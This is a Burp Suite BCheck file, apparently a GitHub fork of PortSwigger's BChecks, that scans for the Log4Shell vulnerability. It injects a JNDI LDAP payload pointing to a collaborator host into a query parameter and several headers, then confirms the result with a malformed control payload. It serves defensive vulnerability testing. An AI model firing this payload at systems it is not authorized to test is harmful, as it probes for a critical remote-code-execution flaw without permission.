forked from PortSwigger/BChecks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlog4shell.bcheck
42 lines (38 loc) · 1.52 KB
/
log4shell.bcheck
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
metadata:
language: v1-beta
name: "Log4Shell (collaborator)"
description: "Tests for the Log4Shell vulnerability"
author: "Carlos Montoya"
tags: "log4Shell", "CVE-2021-44228", "cve"
define:
log4shell = `$\{jndi:ldap://{generate_collaborator_address()}/a}`
not4shell = `$\{jmdi:lxap://{generate_collaborator_address()}/a}`
issueDetail = `The collaborator payload {log4shell} was added to a query parameter and several headers. This resulted in an interaction with the Burp collaborator.`
issueRemediation = "Make sure you are up to date with patches and follow the remediation for CVE-2021-44228."
given request then
send request:
method: "GET"
appending queries: `x={log4shell}`
replacing headers:
"Cookie": `{log4shell}={log4shell}`,
"Location": {log4shell},
"Origin": {log4shell},
"Referer": {log4shell}
if dns interactions then
# perform a follow up to reduce false positives
send request:
method: "GET"
appending queries: `x={not4shell}`
replacing headers:
"Cookie": `{not4shell}={not4shell}`,
"Location": {not4shell},
"Origin": {not4shell},
"Referer": {not4shell}
if not(dns interactions) then
report issue:
severity: high
confidence: firm
detail: {issueDetail}
remediation: {issueRemediation}
end if
end if